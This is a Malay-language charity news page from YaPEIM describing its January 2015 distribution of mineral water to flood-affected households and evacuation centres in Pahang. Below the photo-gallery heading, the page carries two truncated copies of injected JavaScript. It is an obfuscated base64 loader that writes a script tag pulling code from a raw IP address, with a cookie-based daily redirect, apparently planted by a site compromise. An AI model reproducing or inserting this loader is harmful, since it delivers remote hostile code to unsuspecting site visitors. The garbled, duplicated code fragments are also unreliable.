YaPEIM » Bantuan Mangsa Terjejas Banjir di Pahang

Terkini

Bantuan Mangsa Terjejas Banjir di Pahang

YaPEIM menyediakan 400 karton air mineral untuk di agih ke pusat pemindahan mangsa banjir di Pahang

PADA penghujung Disember 2014 banjir besar melanda beberapa buah negeri di Malaysia yang mengakibatkan puluhan nyawa terkorban dan ratusan ribu umat manusia terjejas. Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) telah mengambil inisiatif dengan melancarkan Misi Bantuan YaPEIM. Majlis perlepasan Misi Bantuan YaPEIM telah disempurnakan YAB Timbalan Perdana Menteri Malaysia pada 03 Januari 2015. YaPEIM telah menyediakan 400 karton air mineral untuk di agih ke pusat pemindahan mangsa banjir dan individu-individu yang terjejas akibat banjir khususnya di maran, Jengka, Kuala Krau dan sekitar Temerloh

Cawangan Utama Ar Rahnu YaPEIM Jengka telah dijadikan sebagai pusat pengumpulan sebelum air mineral tersebut diagih-agihkan kepada mangsa banjir. Ketua Pengarah YaPEIM iaitu Dato’ Abibullah Haji Samsudin sendiri telah menyertai Misi Bantuan YaPEIM di Kuala Krau dan Temerloh bagi mengagih-agihkan air mineral kepada mangsa-mangsa banjir.

Secara keseluruhannya pengagihan bantuan air mineral tersebut berjalan dengan lancar di mana pengagihan tersebut telah dibuat 4 pusat pemindahan dan 110 buah rumah individu di Kuala Krau, Maran, Temerloh dan Jengka.

Proses pengagihan bermula pada 04 Januari 2015 dengan Felda Jengka 8 tempat pertama bantuan diagihkan. Sebanyak (80 karton) air mineral telah diagihkan kepada 80 buah rumah yang terjejas teruk akibat banjir. Bantuan diteruskan dengan agihan seterusnya iaitu di Sungai Tekam sebanyak (30 karton) Pusat Pemindahan Mukim Jenderak 1 di bandar Kuala Krau sebanyak (50 karton), Pusat Pemindahan SMK Kuala Krau (80 karton), Pusat pemindahan Kampung Bintang, Temerloh (80 karton) dan Pusat Pemindahan Chenor (80 karton).

Mangsa-mangsa bencana banjir secara keseluruhannya menghargai peranan YaPEIM dalam membantu mereka yang terjejas akibat banjir, bekalan air bersih sangat diperlukan memandangkan bekalan air paip masih lagi belum pulih sepenuhnya.

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top